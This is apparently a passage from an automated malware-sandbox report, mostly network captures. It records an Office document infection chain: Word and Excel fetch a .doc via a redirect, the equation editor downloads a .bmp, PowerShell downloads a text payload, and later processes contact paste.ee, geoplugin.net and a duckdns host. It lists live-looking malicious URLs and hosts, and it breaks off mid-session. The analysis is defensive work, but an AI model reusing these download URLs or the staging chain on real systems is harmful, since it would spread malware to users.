            May 27, 2024 09:00:58.532644987 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532679081 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532685995 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.532711029 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532747030 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532757998 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.532780886 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532813072 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532826900 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.532844067 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532881975 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532887936 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.532916069 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532948971 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.532959938 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.532983065 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533016920 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533025980 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533049107 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533082008 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533092022 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533116102 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533149004 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533155918 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533180952 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533212900 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533224106 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533247948 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533279896 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533288956 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533313036 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533345938 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533354044 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533381939 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533413887 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533423901 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533447981 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533479929 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533490896 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533513069 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533545017 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533556938 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533576965 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533612013 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533643007 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533644915 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533675909 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533691883 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533709049 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533740997 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533755064 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533771992 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533804893 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533819914 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533838034 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533871889 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533885002 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533904076 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533936977 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.533951044 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.533971071 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.534099102 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.534115076 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.534131050 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.534163952 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.534178019 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.534197092 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.534229994 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.534243107 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.534261942 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.534296036 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.534307957 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.637381077 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.637485027 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.637521982 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.637629986 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.637629986 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.637686968 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.637723923 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.637758017 CEST8049175198.46.178.154192.168.2.22
            May 27, 2024 09:00:58.637774944 CEST4917580192.168.2.22198.46.178.154
            May 27, 2024 09:00:58.637789965 CEST8049175198.46.178.154192.168.2.22
            Timestamp | Source IP | Dest IP | Checksum | Code | Type
            May 27, 2024 09:01:00.514166117 CEST | 192.168.2.22 | 8.8.8.8 | d017 | (Port unreachable) | Destination Unreachable
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            May 27, 2024 09:00:26.224787951 CEST | 192.168.2.22 | 8.8.8.8 | 0xe56d | Standard query (0) | z2.ink | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:28.245930910 CEST | 192.168.2.22 | 8.8.8.8 | 0x40b1 | Standard query (0) | z2.ink | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:30.514481068 CEST | 192.168.2.22 | 8.8.8.8 | 0x6c58 | Standard query (0) | z2.ink | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:30.523457050 CEST | 192.168.2.22 | 8.8.8.8 | 0xac74 | Standard query (0) | z2.ink | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:35.741246939 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | z2.ink | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:35.750511885 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | z2.ink | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:40.940715075 CEST | 192.168.2.22 | 8.8.8.8 | 0xaf8f | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:45.540364027 CEST | 192.168.2.22 | 8.8.8.8 | 0xf321 | Standard query (0) | uploaddeimagens.com.br | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:59.262916088 CEST | 192.168.2.22 | 8.8.8.8 | 0x123a | Standard query (0) | sembe.duckdns.org | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:01:00.506386995 CEST | 192.168.2.22 | 8.8.8.8 | 0x123a | Standard query (0) | sembe.duckdns.org | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:01:03.028729916 CEST | 192.168.2.22 | 8.8.8.8 | 0xf72e | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            May 27, 2024 09:00:26.239998102 CEST | 8.8.8.8 | 192.168.2.22 | 0xe56d | No error (0) | z2.ink |  | 54.241.153.192 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:28.262379885 CEST | 8.8.8.8 | 192.168.2.22 | 0x40b1 | No error (0) | z2.ink |  | 54.241.153.192 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:30.521667004 CEST | 8.8.8.8 | 192.168.2.22 | 0x6c58 | No error (0) | z2.ink |  | 54.241.153.192 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:30.538206100 CEST | 8.8.8.8 | 192.168.2.22 | 0xac74 | No error (0) | z2.ink |  | 54.241.153.192 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:35.748883963 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | z2.ink |  | 54.241.153.192 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:35.765091896 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | z2.ink |  | 54.241.153.192 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:40.950962067 CEST | 8.8.8.8 | 192.168.2.22 | 0xaf8f | No error (0) | paste.ee |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:40.950962067 CEST | 8.8.8.8 | 192.168.2.22 | 0xaf8f | No error (0) | paste.ee |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:45.551029921 CEST | 8.8.8.8 | 192.168.2.22 | 0xf321 | No error (0) | uploaddeimagens.com.br |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:00:45.551029921 CEST | 8.8.8.8 | 192.168.2.22 | 0xf321 | No error (0) | uploaddeimagens.com.br |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:01:00.361174107 CEST | 8.8.8.8 | 192.168.2.22 | 0x123a | No error (0) | sembe.duckdns.org |  | 194.187.251.115 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:01:00.513991117 CEST | 8.8.8.8 | 192.168.2.22 | 0x123a | No error (0) | sembe.duckdns.org |  | 194.187.251.115 | A (IP address) | IN (0x0001) | false
            May 27, 2024 09:01:03.038537979 CEST | 8.8.8.8 | 192.168.2.22 | 0xf72e | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
            • paste.ee
            • uploaddeimagens.com.br
            • z2.ink
            • 198.46.178.154
            • geoplugin.net
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.22 | 49161 | 54.241.153.192 | 80 | 1648 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:26.250842094 CEST | 317 | OUT | GET /nLNG HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: z2.ink
            Connection: Keep-Alive
            May 27, 2024 09:00:26.838306904 CEST | 605 | IN | HTTP/1.1 301 Moved Permanently
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Location: http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc
            Date: Mon, 27 May 2024 07:00:14 GMT
            Content-Length: 89
            Content-Encoding: gzip
            Vary: Accept-Encoding
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.22 | 49162 | 198.46.178.154 | 80 | 1648 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:26.850008965 CEST | 491 | OUT | GET /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: 198.46.178.154
            Connection: Keep-Alive
            May 27, 2024 09:00:27.382081985 CEST | 1236 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:27 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:45:40 GMT
            ETag: "89d4-61964d6254bf9"
            Accept-Ranges: bytes
            Content-Length: 35284
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.22 | 49163 | 54.241.153.192 | 80 | 1668 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:28.274204016 CEST | 128 | OUT | OPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: z2.ink
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:28.872950077 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Date: Mon, 27 May 2024 07:00:28 GMT
            Content-Length: 102317
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive
            Data Ascii: VJWUgsjZ0B4uaVQ.woff) format('woff');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr
            May 27, 2024 09:00:28.873225927 CEST1236INData Raw: 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68
            Data Ascii: fonts.gstatic.com/s/opensans/v35/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4ewA.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: italic;font-weight: 600;font-stretch: normal;font-display: swap;src: url(h
            May 27, 2024 09:00:28.873291016 CEST328INData Raw: 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 33 35 2f 6d 65 6d 53 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 76 57 62 58 32 76 56 6e 58 42 62 4f 62 6a 32 4f 56 5a 79
            Data Ascii: rl(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 600;font-stretch: normal;font-display: swap;sr
            May 27, 2024 09:00:28.873307943 CEST1236INData Raw: 79 4f 4f 53 72 34 64 56 4a 57 55 67 73 67 48 31 78 34 75 61 56 49 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73
            Data Ascii: yOOSr4dVJWUgsgH1x4uaVI.woff2) format('woff2');}@font-face {font-family: 'Open Sans';font-style: normal;font-weight: 700;font-stretch: normal;font-display: swap;src: url(https://fonts.gstatic.com/s/opensans/v35/memSYaGs126MiZpBA-UvWbX2vVnXBbObj
            May 27, 2024 09:00:28.873346090 CEST1236INData Raw: 6d 2f 73 2f 6d 6f 6e 6f 74 6f 6e 2f 76 31 35 2f 35 68 31 61 69 5a 55 72 4f 6e 67 43 69 62 65 34 54 6b 48 4c 52 41 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 7d 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c
            Data Ascii: m/s/monoton/v15/5h1aiZUrOngCibe4TkHLRA.woff) format('woff');}/* User Agent: Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0 */@font-face {font-family: 'Monoton';font-style: normal;font-weight: 400;font-display: swap;src: url(
            May 27, 2024 09:00:28.878297091 CEST1236INData Raw: 65 77 3a 6c 61 72 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 63 61 6e 6f 6e 69 63 61 6c 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 3f 70 3d 32 38 22 3e 3c 6d 65 74 61 0a 70 72
            Data Ascii: ew:large"><linkrel=canonical href="https://face.linksgpt.com/edge/?p=28"><metaproperty="og:locale" content="en_US"><metaproperty="og:type" content="article"><metaproperty="og:title" content="Not Found - Brandlink Edge"><metaproperty="og:u


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            3 | 192.168.2.22 | 49164 | 54.241.153.192 | 80 | 1668 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:29.255786896 CEST | 128 | OUT | OPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: z2.ink
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:29.836250067 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Date: Mon, 27 May 2024 07:00:29 GMT
            Content-Length: 102317
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            4 | 192.168.2.22 | 49165 | 54.241.153.192 | 80 | 1668 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:29.850625992 CEST | 128 | OUT | OPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: z2.ink
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:30.451380014 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Date: Mon, 27 May 2024 07:00:30 GMT
            Content-Length: 102317
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            5 | 192.168.2.22 | 49166 | 54.241.153.192 | 80 | 1668 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:30.543694019 CEST | 111 | OUT | HEAD /nLNG HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: z2.ink
            May 27, 2024 09:00:31.129097939 CEST | 493 | IN | HTTP/1.1 301 Moved Permanently
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Location: http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc
            Date: Mon, 27 May 2024 07:00:26 GMT
            Vary: Accept-Encoding
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Content-Length: 108
            Connection: keep-alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            6 | 192.168.2.22 | 49167 | 198.46.178.154 | 80 | 1668 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:31.137303114 CEST | 285 | OUT | HEAD /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: 198.46.178.154
            May 27, 2024 09:00:31.629596949 CEST | 321 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:31 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:45:40 GMT
            ETag: "89d4-61964d6254bf9"
            Accept-Ranges: bytes
            Content-Length: 35284
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword
            May 27, 2024 09:00:31.838633060 CEST | 321 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:31 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:45:40 GMT
            ETag: "89d4-61964d6254bf9"
            Accept-Ranges: bytes
            Content-Length: 35284
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword


            Session ID | Source IP | Source Port | Destination IP | Destination Port
            7 | 192.168.2.22 | 49168 | 54.241.153.192 | 80
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:35.770804882 CEST | 123 | OUT | OPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            translate: f
            Host: z2.ink
            May 27, 2024 09:00:36.384897947 CEST | 1236 | IN | HTTP/1.1 404 Not Found
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Date: Mon, 27 May 2024 07:00:36 GMT
            Content-Length: 102317
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Connection: keep-alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            8 | 192.168.2.22 | 49169 | 54.241.153.192 | 80 | 1668 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:37.485235929 CEST | 130 | OUT | HEAD /nLNG HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: z2.ink
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:38.061413050 CEST | 493 | IN | HTTP/1.1 301 Moved Permanently
            Content-Type: text/html; charset=utf-8
            Edge: smart-1.high-performance.network
            Location: http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc
            Date: Mon, 27 May 2024 07:00:31 GMT
            Vary: Accept-Encoding
            Server: LINKSGPT
            Cache-Control: no-store, no-cache, must-revalidate
            Content-Length: 108
            Connection: keep-alive


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            9 | 192.168.2.22 | 49170 | 198.46.178.154 | 80 | 1668 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:38.069988966 CEST | 304 | OUT | HEAD /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: 198.46.178.154
            Content-Length: 0
            Connection: Keep-Alive
            May 27, 2024 09:00:38.571190119 CEST | 321 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:38 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:45:40 GMT
            ETag: "89d4-61964d6254bf9"
            Accept-Ranges: bytes
            Content-Length: 35284
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            10 | 192.168.2.22 | 49171 | 198.46.178.154 | 80 | 3300 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:39.042370081 CEST | 341 | OUT | GET /100500/lionsandtigerbeautifulpicture.bmp HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: 198.46.178.154
            Connection: Keep-Alive
            May 27, 2024 09:00:39.528614044 CEST | 1236 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:39 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:34:34 GMT
            ETag: "262a2-61964ae6c3bdc"
            Accept-Ranges: bytes
            Content-Length: 156322
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: image/bmp


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            11 | 192.168.2.22 | 49175 | 198.46.178.154 | 80 | 3608 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:00:57.472821951 CEST | 78 | OUT | GET /100500/HWE.txt HTTP/1.1
            Host: 198.46.178.154
            Connection: Keep-Alive
            May 27, 2024 09:00:57.974133968 CEST | 1236 | IN | HTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:57 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
            Last-Modified: Mon, 27 May 2024 00:32:16 GMT
            ETag: "a1000-61964a6360cf0"
            Accept-Ranges: bytes
            Content-Length: 659456
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/plain


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            12 | 192.168.2.22 | 49177 | 178.237.33.50 | 80 | 3972 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Timestamp | Bytes transferred | Direction | Data
            May 27, 2024 09:01:03.046850920 CEST | 71 | OUT | GET /json.gp HTTP/1.1
            Host: geoplugin.net
            Cache-Control: no-cache
            May 27, 2024 09:01:03.683459044 CEST | 1171 | IN | HTTP/1.1 200 OK
            date: Mon, 27 May 2024 07:01:03 GMT
            server: Apache
            content-length: 963
            content-type: application/json; charset=utf-8
            cache-control: public, max-age=300
            access-control-allow-origin: *
            Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.22 | 49172 | 188.114.97.3 | 443 | 3400 | C:\Windows\SysWOW64\wscript.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-05-27 07:00:41 UTC | 302 | OUT | GET /d/iuC2i HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
